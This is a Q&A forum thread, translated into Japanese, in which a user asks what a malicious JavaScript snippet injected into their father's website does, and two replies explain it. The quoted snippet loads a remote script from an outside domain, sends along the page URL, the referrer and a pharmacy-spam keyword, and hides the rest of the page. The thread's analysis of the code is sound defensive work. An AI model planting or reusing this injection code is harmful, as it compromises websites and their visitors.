2009-07-28 9 views
2
<SCRIPT> 
    ff = 0; 
    for (nn in document) if (nn == 'etours' || nn == 'logo-anim') ff = 1; 
    if (ff == 0 || (/LIVE|MSN|YAHOO|GENERIC|NORVASC/.test (document.referrer.toUpperCase()) && false)) { 
    document.write('<SCRIPT SRC ="http://p090303.info/w.php?l='+ escape(location.href) + '&k=' + escape('generic norvasc') + '&r=' + escape(document.referrer) + '"><' + '/SCRIPT>'); document.write ('<' + '!--'); 
    } 
</SCRIPT> 

このコードを認識していますか?私はそれがいくつかのウェブサイトに詰まっているのを見ますが、すべての文字が16進数または8進数に置き換えられています。誰かがこのコードを私の父親のサイトに投稿しましたが、何をしているのか分かりません。 Webページを参照元にマッピングすることが収穫されているようですが、最初の数行が何をしているのか分かりません。誰でもここで何が起こっているか考えている?悪意のあるjavascriptがフォーラムに投稿されました

答えて

5

スクリプトタグをJavaScriptに書き込んでいます。彼らのjavascriptはあなたのウェブサイトで実行され、あなたのウェブサイトに何でもしてくれます。

最初の数行は、おそらくスクリプト内で作成される可能性のある変数のチェックです。おそらく、スクリプトタグがすでに書かれているかどうかをチェックすることと関係します。

2

依存関係(他のコードで設定されたjavascript変数)をチェックしている場合は、自宅にダイアルしてホームサーバーに感染したページが分かるようにします。キエフのHome appears to be here

関連する問題